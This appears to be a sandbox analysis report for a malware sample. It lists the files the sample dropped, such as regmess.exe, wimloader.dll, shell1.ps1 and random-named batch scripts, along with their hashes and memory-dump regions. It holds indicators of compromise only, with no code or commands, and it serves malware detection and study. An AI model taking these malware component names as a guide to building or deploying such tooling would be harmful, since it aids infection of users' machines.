SHA512 f41f0880443cd0bad0d98ed3ef8f4541840cb9de9d4bd0f7e354dc90d16c3077d8bb2559a362e6045e9abd478e4fd6a3333f536a518e3769952479dfff1d0b91

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exe

MD5 5c4d7e6d02ec8f694348440b4b67cc45
SHA1 be708ac13886757024dd2288ddd30221aed2ed86
SHA256 faaa078106581114b3895fa8cf857b2cddc9bfc37242c53393e34c08347b8018
SHA512 71f990fe09bf8198f19cc442d488123e95f45e201a101d01f011bd8cdf99d6ccd2d0df233da7a0b482eab0595b34e234f4d14df60650c64f0ba0971b8345b41f

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe

MD5 63d052b547c66ac7678685d9f3308884
SHA1 a6e42e6a86e3ff9fec137c52b1086ee140a7b242
SHA256 8634e9241729f16a8c2c23d5c184384815b97026e3d1a2d6dd0ddc825b142aba
SHA512 565b9243ec14dc1cf6f6ddf4a7158e208937f553367e55cd59f62f1834fcfb7d9fb387b0636dc07520f590dcd55eb5f60f34ea2279dc736f134db7b19e3aa642

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\screenshot.png

MD5 de8ddeeb9df6efab37b7f52fe5fb4988
SHA1 61f3aac4681b94928bc4c2ddb0f405b08a8ade46
SHA256 47b5cbeb94eaec10a7c52458195d5ba7e2e53d732e9e750f1092eb016fd65159
SHA512 6f8e30ddb646ea5685b0f622b143cdd7bc5574a765f4f14797df45739afcdefaba7786bac9ad8637c64893a33f14e5adcfb3af5869fc10c105760a844108e27e

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe

MD5 97cd39b10b06129cb419a72e1a1827b0
SHA1 d05b2d7cfdf8b12746ffc7a59be36634852390bd
SHA256 6bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc
SHA512 266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\selfaware.exe

MD5 5cb9ba5071d1e96c85c7f79254e54908
SHA1 3470b95d97fb7f1720be55e033d479d6623aede2
SHA256 53b21dcfad586cdcb2bb08d0cfe62f0302662ebe48d3663d591800cf3e8469a5
SHA512 70d4f6c62492209d497848cf0e0204b463406c5d4edf7d5842a8aa2e7d4edb2090f2d27862841a217786e6813198d35ea29b055e0118b73af516edf0c79dcfad

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe

MD5 50b9d2aea0106f1953c6dc506a7d6d0a
SHA1 1317c91d02bbe65740524b759d3d34a57caff35a
SHA256 b0943c4928e44893029025bcc0973e5c8d7dbf71cc40d199a03c563ecb9d687d
SHA512 9581a98853f17226db96c77ae5ef281d8ba98cbc1db660a018b4bf45c9a9fb6c5a1aaaf4c2bae5d09f78a569ecb3e8162a4b77a9649a1f788a0dbdde99bd596c

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\2.hta

MD5 dda846a4704efc2a03e1f8392e6f1ffc
SHA1 387171a06eee5a76aaedc3664385bb89703cf6df
SHA256 e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25
SHA512 5cc5ad3fbdf083a87a65be76869bca844faa2d9be25657b45ad070531892f20d9337739590dd8995bca03ce23e9cb611129fe2f8457879b6263825d6df49da7a

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe

MD5 d952d907646a522caf6ec5d00d114ce1
SHA1 75ad9bacb60ded431058a50a220e22a35e3d03f7
SHA256 f92ad1e92780a039397fd62d04affe97f1a65d04e7a41c9b5da6dd3fd265967e
SHA512 3bfaee91d161de09c66ef7a85ad402f180624293cdc13d048edbeec5a3c4ad2bc84d5fde92383feb9b9f2d83e40a3e9ff27e81a32e605513611b6001f284b9fe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\xcer.cer

MD5 a58d756a52cdd9c0488b755d46d4df71
SHA1 0789b35fd5c2ef8142e6aae3b58fff14e4f13136
SHA256 93fc03df79caa40fa8a637d153e8ec71340af70e62e947f90c4200ccba85e975
SHA512 c31a9149701346a4c5843724c66c98aae6a1e712d800da7f2ba78ad9292ad5c7a0011575658819013d65a84853a74e548067c04c3cf0a71cda3ce8a29aad3423

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dll

MD5 a67128f0aa1116529c28b45a8e2c8855
SHA1 5fbaf2138ffc399333f6c6840ef1da5eec821c8e
SHA256 8dc7e5dac39d618c98ff9d8f19ecb1be54a2214e1eb76e75bd6a27873131d665
SHA512 660d0ced69c2c7dd002242c23c8d33d316850505fc30bad469576c97e53e59a32d13aa55b8b64459c180e7c76ea7f0dae785935f69d69bbd785ee7094bd9b94b

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll

MD5 9191cec82c47fb3f7249ff6c4e817b34
SHA1 1d9854a78de332bc45c1712b0c3dac3fe6fda029
SHA256 55ef4ff325d653a53add0ca6c41bc3979cdb4fc3ef1c677998dc2c9ea263c15b
SHA512 2b482e947e26e636e7ed077b914788b1af8c28722efcbd481dd22940cfb771e38c3e2ed6c8f9208eb813085c7d4460978e13a5ef52441e7be7ada9f6414a6673

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web3.htm

MD5 9e118cccfa09666b2e1ab6e14d99183e
SHA1 e6d3ab646aa941f0ca607f12b968c1e45c1164b4
SHA256 d175dc88764d5ea95f19148d52fde1262125fedb41937dc2134f6f787ae26942
SHA512 da02267196129ebeaa4c5ff74d63351260964fa8535343e3f10cd3fcf8f0e3d0a87c61adb84ec68b4770d3ef86535d11e4eacf6437c5f5fbe52c34aa6e07bd04

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web2.htm

MD5 1fc6bb77ac7589f2bffeaf09bcf7a0cf
SHA1 028bdda6b433e79e9fbf021b94b89251ab840131
SHA256 5d0147dc2b94b493d34efd322da66921f2d3d2b1cc7b0226ac1d494f99a933a1
SHA512 6ef21162b85975fdd58628dcab0d610ce7acd8ab36820a09e9e8eb1e6b2d76060ed4ad2b48bdbe1e212ec84abb309e124a752e078f6747893a83562824ea6af6

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web.htm

MD5 f63c0947a1ee32cfb4c31fcbc7af3504
SHA1 ee46256901fa8a5c80e4a859f0f486e84c61cbaa
SHA256 bfe43062464da1f859ea3c2adace8ff251e72d840b32ef78c15b64c99f56d541
SHA512 1f8666abfd3e5543710c6d2c5fb8c506d10d9f0f0306b25ba81176aa595a5afa8c288b522832f8ffe0a12873eaf2c2a0eff49ce4caa88400e8db7a8870a42184

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exe

MD5 e45dcabc64578b3cf27c5338f26862f1
SHA1 1c376ec14025cabe24672620dcb941684fbd42b3
SHA256 b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455
SHA512 5d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\stopwerfault.cmd

MD5 7eacd2dee5a6b83d43029bf620a0cafa
SHA1 9d4561fa2ccf14e05265c288d8e7caa7a3df7354
SHA256 d2ac09afa380a364682b69e5d5f6d30bb0070ca0148f4077204c604c8bfae03b
SHA512 fd446a8968b528215df7c7982d8dae208b0d8741410d7911023acee6ad78fee4fdec423a5f85dd00972a6ac06b24a63518f741490deab97639628b19256791f8

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\spinner.gif

MD5 324f8384507560259aaa182eb0c7f94a
SHA1 3b86304767e541ddb32fdda2e9996d8dbeca16ed
SHA256 f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5
SHA512 cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe

MD5 288a089f6b8fe4c0983259c6daf093eb
SHA1 8eafbc8e6264167bc73c159bea34b1cfdb30d34f
SHA256 3536c40290b9e7e9c3c47a96ab10fe3b737f334dd6779eaf70e35e91e10a677b
SHA512 c04bf3530cd471d589efb8f7e6bdddb39422fc4284afc7f2d3645a646ebbee170d57dc57eff30cee05ef091c64c6a98586c5a887d25fe53e49531c137d285448

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\shell1.ps1

MD5 29a3efd5dbe76b1c4bbc2964f9e15b08
SHA1 02c2fc64c69ab63a7a8e9f0d5d55fe268c36c879
SHA256 923ad6ca118422ee9c48b3cc23576ee3c74d44c0e321a60dc6c2f49921aea129
SHA512 dfa3cdaab6cc78dddf378029fdb099e4bb1d9dcad95bd6cd193eca7578c9d0de832ae93c5f2035bc6e000299ad4a157cc58e6b082287e53df94dcc9ddbab7c96

memory/480-315-0x00000000026D0000-0x00000000026D2000-memory.dmp

memory/2072-318-0x000000007403E000-0x000000007403F000-memory.dmp

memory/2908-373-0x0000000005B00000-0x0000000006050000-memory.dmp

memory/2908-374-0x0000000006050000-0x000000000659E000-memory.dmp

memory/2072-520-0x0000000074030000-0x000000007471E000-memory.dmp

memory/2908-426-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-424-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-422-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-420-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-418-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-416-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-414-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-412-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-410-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-408-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-406-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-404-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-402-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-400-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-398-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-396-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-394-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-392-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-390-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-388-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-386-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-384-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-382-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-380-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-378-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-377-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-478-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-476-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-474-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-472-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-470-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-468-0x0000000006050000-0x0000000006599000-memory.dmp

memory/2908-467-0x0000000006050000-0x0000000006599000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4BC2.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar4BC5.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6f068416fafec50a710c939dfb2204d3
SHA1 183d3448e09291e79e347c4825b1feb252a1de57
SHA256 26b71fcb9f7187eaf238b86c7762b4eb75ad55a277394e4744151f3e788f9503
SHA512 fbe74b3bfe6dbe4615ea7ef59dc33e0a03c4bf8d736baea7710c12942337c6888ea3519ddbe23f8f4a4e0b9644741dbda906dcc6cd0d268ffaeb17b9c3d87ae9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1801A0BFF52C676E5F51CA71C5350277

MD5 79e4a9840d7d3a96d7c04fe2434c892e
SHA1 a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436
SHA256 4348a0e9444c78cb265e058d5e8944b4d84f9662bd26db257f8934a443c70161
SHA512 53b444e565183201a61eeb461209b2dc30895eeca487238d15a026735f229a819e5b19cbd7e2fa2768ab2a64f6ebcd9d1e721341c9ed5dd09fc0d5e43d68bca7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3bc05f185b22c4eb2225c3f07dd8beb4
SHA1 8c1d46d8f0505d6ccdfb8834189e66fa9e32e4dd
SHA256 16c74e4e3ecd0099ba7595d4317a1078a71ec9f2d65bba8c79baaa9ada7c9371
SHA512 b3b2b4ef9e1d5e065c2f9ae2e9950a26c83119b1fbb0ac8e48c12aa229982e4e599bc7669e5cf0c2841500c9566d8e5ae4e7b7f62f6d59cb1b7e22e5120fc0ca

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 83f08621d274f0c9dd94c7bcdf1ddb40
SHA1 77737f46f6c0b4a013a51c480746bd2e24a463aa
SHA256 5d41383bebee44a15032a724a293f84757f6c1dbf083a7ffd9a1d61549da6890
SHA512 ef1c274e8571f84cdf7cd128fc93ed3d015487dfd4ca53d488915fd772313a6fbde76da0985ecb566c3eec8af98740358abe989ec74e6e85ac3dd8f8dcd43b7b

memory/2908-3502-0x000000000C2C0000-0x000000000C9A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico

MD5 12e3dac858061d088023b2bd48e2fa96
SHA1 e08ce1a144eceae0c3c2ea7a9d6fbc5658f24ce5
SHA256 90cdaf487716184e4034000935c605d1633926d348116d198f355a98b8c6cd21
SHA512 c5030c55a855e7a9e20e22f4c70bf1e0f3c558a9b7d501cfab6992ac2656ae5e41b050ccac541efa55f9603e0d349b247eb4912ee169d44044271789c719cd01

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\78076te\imagestore.dat

MD5 fd5239d23117c03e89e9015265773c0b
SHA1 43f6879fd07a5fa4fecb63efc78f87f4b6c902c2
SHA256 ad75428b466cd88c82b2cc02c9d49b2bb52da140a3d5960f6662a3203d9632b6
SHA512 0a00f6453e5fb1fb43c0dc0a5b5f4a1d3ce31c5ec833c3f24facc8540c94f6e2de355869cce80f0864aea56c4d53051cb9366a8cc59114faa0acc329d8aac83f

memory/3856-3559-0x0000000000C20000-0x0000000000C7E000-memory.dmp

memory/3856-3562-0x00000000002F0000-0x0000000000314000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\regmess_239e6675-cf83-4482-a135-4b30a903012e\regmess.bat

MD5 7c8a2529f9537f733c82bdd1b9ee6311
SHA1 c55ebc368e4a0ba8a44e77cd049e28a125d2e9d6
SHA256 499218914bad2e060cc8556284e329847d9b43d0a6b8f03bbbf5145fea4ad00d
SHA512 32cb874efa8906ec481391b22af937bbcf15cae9b6cc335fe9b3cba0cea67c698278fe79db040c8d8ae84d75d7400910e3b02c26654cfee29917e58d8da31d0e

memory/3844-3611-0x0000000002150000-0x0000000003777000-memory.dmp

memory/3932-3624-0x0000000000A40000-0x0000000002067000-memory.dmp

C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe

MD5 6bb0ab3bcd076a01605f291b23ac11ba
SHA1 c486e244a5458cb759b35c12b342a33230b19cdf
SHA256 959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512 d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod

MD5 5ad5cc4d26869082efd29c436b57384a
SHA1 693dad7d164d27329c43b1c1bff4b271013514f5
SHA256 c5c24f7ca1c946fa4dfd44407409c8e11ec6e41f0e1c7c45bf8381b42afb31f1
SHA512 36efc511a98e53031d52dacdd40292a46fe5eab0194a0e9512f778f88b84fac5aac1eebb6e281c44e40ef2ddc3cdea41df7f5a50e4024cd86c087ed909fe8629

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 5298ac25dd66641c380de618e98620ba
SHA1 20f7ed546119f8618d3057af467546e26f9acf4b
SHA256 81d56a45b6764838898647a0013300ea9e5a18e65fb08d0bda5ec1f868739b77
SHA512 12c5626c414a00698bfd44042206e4b8b376f07bbe127b4a4c67adf5837dad858aa8f32851b7266fc3840b8403a0ec89897c017d10e1e2adb834ca0070a03521

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 db20ff7525c76948dc0b7ed2e4dead10
SHA1 c93b36630f0cd9be6cf2923ddd4d16403968ebae
SHA256 bb160d435b63baf243efa61d0d34daa8df897a6f7480d4b55c7ab79adca18f9c
SHA512 e7dffb2077fddcd02268459595a333c59193346cd2d3ef399ea97491c43a0cd1ae8462a4a516f8d2a3d868bc91fd198607067237bb3ae3aa25cd5d556c030b33

C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe

MD5 8cde6943b4d4d6e84c1abc9683c63d8c
SHA1 b863a290d1fd697d51ee2d7ef69f3f3b828a03d1
SHA256 17ffc757e9be1b332c762187b26beaf7ca05aba45d85df28e4894060022b76d6
SHA512 1fbcf6f38e99e06f46157f17c168ad86180da176e429c87d4c1b6b4e139624ee9d00def194c51e96340f2ae6ad7ae0219a01b435f9bedc6b0992a52c0144f4d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 72c7c8c07101b27fa3fd40a5d8ac513e
SHA1 d373b24220c13fee50f08d1062950230718327af
SHA256 a285995a999416ded29bff78c6cd6398fe7f57dc95e763713314aa59b8f5b2cb
SHA512 c15f71832bf7c6ba0121f67bc0e45e71f94ad44d9a31837d258c378b5e32460a716d5a8cc64d305ffba30e7d367952ecba1f3625c4093450a6f2ae2444c5e272

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5f915f9dbaaccd1bf78e2b5cc1e0d82d
SHA1 109e5895e3747531b3de5a577c369ca38f1a5ef7
SHA256 4d85df9a28738ec7e18002a8e4057cb2b1bb16934cb4de1d44900c3874914cb8
SHA512 1411cbb174332326e2d2d7878b0f39e69231d86a55584f8160f509f1000a228ff9056b49518f62147ac97753e76fd2ea6e644f780be9ce85c4b0abe0ef3f9bed

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 37d06293bec42e5e5c944f1233ad806c
SHA1 048e4f859f806012aa221b15967444500168aa07
SHA256 43153930c7e2c522d6aa5354ede7d93d00d4376f9cfc4ecd5e5b6b05e809f00e
SHA512 c538b7ee554578dadb33c8166ae41022f35efabc8155c4fe81c1fdee0c404e06482d73bb07d9bb7eb3b26bdbd3935afa4b51c0c7db74584975827b25a1020b5f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2f7f05af4085faaeb1234b9867c53ee0
SHA1 06cd753449110c36214a9a12514f860256021629
SHA256 36bad66805a5e5acfdd070b9bdb1ad00dbd5d3a508615807862ccb7b7f935aac
SHA512 c7dd07ed20e894301e7da945e63d117a2907c2f85db93331e741f4ed5023aa079103563aa12d07c00860e5d80eda6415ba74cc69a0aa90d98cdaa3079b01512c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0585c71e8b627117018fe98f6d4e997c
SHA1 7e8be006e0f9b807b909f782d0aa562d52091a26
SHA256 eeb3dc4089b2c08151d3e8532fa1cabe6de940b566bac0f981b34745c4d30585
SHA512 b93b45b4861cbf35ff421407b873df0ac9af044086557079225eac6a2c2783a1d1d7f4475f78d1ff427df3e795f88c97c176bb0b265877dca5b6d24aef5f1f27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 82f7481c6d2657b0751e2f99d8d7f60c
SHA1 1eff6dc53bdf88795c2db6c2844de695cca37d91
SHA256 e25f09b908f4fc08eeab97a268de8cb207af1e140f412a6dbd628f173d47a20b
SHA512 4fe1e2a9af4d9e47ce6c01bae02ffac9f321bfd7d79ddfc58538238d460add90b77e58af0cfbe27e910c9f128c9950170b384f8b0cafc33589ff7ff605112f75

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 200721a4e509b21e31368f1a0bed8a30
SHA1 ca469b14da46e833784f741e4631359043340391
SHA256 208d7946a68e4e60797a310f704871e0a3b2ec6f45d232bfdf34fe445c8e1284
SHA512 4b3112f14d3e0c17acd8adc27c3f8a05842763cfb20901e3d59a42d2c8c863cd9d800189cbb9a450d8918aa2b10d37be19aee35a92a2799e840bc1a4d0707229

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 99d58cad8024cdb5efcb790ceeed833b
SHA1 406f885d63dc90d68f0a9c2b2ad35906f9564f2f
SHA256 6c67f1c6bba736910695ee40013cbc1dcdb40206a7eaaeb4eb5a1aab6f49d9da
SHA512 f9fbf9256ab6c85cb5f2dc87b5508611190b929b2ab18a2f784f2cc95aea2c69eb9c04010ed1a39dcbcc4a50f70db9488294a182d5a8b5f6579428b47af35135

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 413dcccf90fdf3971f4515206484c425
SHA1 11a604dcc3653196a3bbea431b918f473c4a2b85
SHA256 e1f53f85431f2b7c0dde53cdde0afef39380835b49a6add8577699574ae40ed0
SHA512 42d50a7f371c961cd30f7e3fa311b8df1a93d5314a19fdd6285a0a5aa9f9d886e3b54d6ef62e8304ba00e0fb5f686be44337041f1bfc90e4982ab3a8a0d9dc39

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 8c4bc7e33b00e0be9a8b8fc11ee2b767
SHA1 0fc4b04121eea70779eed2af54ff7969755b2b13
SHA256 f190ad299ac910b44a64c28eb1e27e042eb4ca6fdcb7087cd82001cac6c4aa5f
SHA512 5a59da5ab85dcb10e4059721a154e9ab96345811ff01cb5b043370a9e275b1f361666010e01c1a75a8e8e8c46d12b54a8a43d32c3e41820e04dd85ab3ce7dc1f

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 bc16bece34decbc4586579142554ed18
SHA1 7aa956f194b36d541c71283b6844e54e33f00390
SHA256 7c290d277de0aa83de1402478faf3495f0c6e5d3ff1bd96fa0d74dc599ba4bd4
SHA512 a7481689a29dcab138796909c5536646bd786545c8196276f8bf532e2e9dd498fc7ae2948b455c348872a6754ccbded352f112c3985584f42750db45f80038da

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 dd4ab86bba90ccfdf304636ca365a406
SHA1 2278c4024f4962a734290e89b516c174d7351e9c
SHA256 bebea0756c4f49c5c2bbf9f66ed707da1d6d2e7d90f9d7c66ac60747af4fead6
SHA512 3b361c43bcc0816a397b0705264c266c27dd6ed4a6adef656d71997ce27820f99a57e85d2edb226785e48d76de784169245f3c9530aab0102fc9c95043d7758e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c50fec4e8a9398f6a6080afb78e1b3b1
SHA1 5cac0c06e2bf6195a9a2ae59d29b023bce66ae3f
SHA256 c0f82fc52120b9074c12c837f9895b6d9ab5e077f54a75df2e5916d9caf6d89c
SHA512 2399d37e343a7d9128cd566c13e31954a86b9114f4f417a53b15b47e16da153c5722993ea4f868462e2c5454fcbf68a51f4de6d3008a2eb88e11bb241b6f7486

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 6e97b1e9e92ae4998cec2f7c538b86da
SHA1 4990cb26699d69c2a0b503a46addceae58d52772
SHA256 a1a3d38d86758c746d92ce162dbcf73cf2ef0bcc7ff158969989ddc2312ec203
SHA512 4b05b81d46e8efd887eb91d845085c9b83e1a64182e064b757c6d2eb74f2d95b0a325401efbae506fb0e1a278040dd2b23a98fa0b1fff2b80aabc906e1a42eee

C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit

MD5 9fa2cc88f66a81f359ff33af32bc2727
SHA1 d3a41306961552ae467ed6ae7a456598d2f44e31
SHA256 eb62c1af572fb36074f3b7ea73f0a191c7cae3eabbe7590874f603b94b960365
SHA512 d5e545de98c3f93fcd2ff31ac48e7ab8b15a374ab85ffa76dcc2d87ce09964a5f19c77f6339c00725e1a608c05f4f476a4881d7f88bffe56406c497b458298aa

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6G4X5UFP\favicon[1].ico

MD5 f210fc0564ae5a5a2985b2848e75cba2
SHA1 29bf0540e4c291cc6c6d071ac8125cc65314fbe9
SHA256 d453748d5f8e5bb6c62791b97c733dba1d7dc3340bde957470285b2a7185b7ec
SHA512 46fac4e98cc34105d74a8a159c70d48191612f88e5ab1a7ee7276e7b2c95407d71d307509ef8b9f0aed28465688839f49b2a55da4b03f7d01b3f03c908067e8c

memory/1272-4491-0x0000000001260000-0x0000000001584000-memory.dmp

memory/2024-4492-0x0000000000CF0000-0x0000000000D7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wimloader_fb327d75-e738-4d0c-bcde-5d4cf1554e73\caller.cmd

MD5 7aa447ec3e79e0d47516536d24a56ae5
SHA1 b91f565b38bbbee8924640507680750757e96ee9
SHA256 9b406b2eb50917ab2fd8a494c800665f61adebb878bb21f73b0c477b980957b5
SHA512 9a5ed7effc54f1da116c831e9fb3bf1b0d37b2bf6995d18e197ac5330e1100ec98f144148b5285da149df7dd20fe82f62f681f3155b25f922c1b201d82d34e3a

memory/3844-4518-0x0000000002150000-0x0000000003777000-memory.dmp

memory/3932-4519-0x0000000000A40000-0x0000000002067000-memory.dmp

memory/3144-4544-0x0000000000EA0000-0x00000000011C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat

MD5 02b31070e4106f366e4745a259fd02a2
SHA1 1a2e4204c48b0a6bd7dfd58b353a4ddace8478c5
SHA256 62eb0559d3fd4b1d90f0bd93f75598a36a64bf72cb541c65eadcdad81fb21cc8
SHA512 8f4ce4bfe17a5215d793ad257699d4c00c282e403fc151a3fb27800af874d1f1af4c12bc615b313117780d69976c4ce188acb2c8ab59c93851b06c5bece1d812

memory/3052-4581-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/3052-4582-0x0000000001E00000-0x0000000001E08000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DS2lJjxX5bYw.bat

MD5 98e5e26ecbc0e505b16e1e7d40be8691
SHA1 4ccfa88ca0aa3beac694d51121fca07faab88e59
SHA256 bce48ba09fd04d468aa4b522573ddadf27c6ee42181a6da6f7c7bab896c793ae
SHA512 2f8ac7be2b7b92ab59bf4ac3646713769f14226ebd99d1226800f0b3be90976a31e79885a9df19c6c459a6d1c4b88e3315c817474d5a5817099d704871adc2c3

C:\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\logo.png

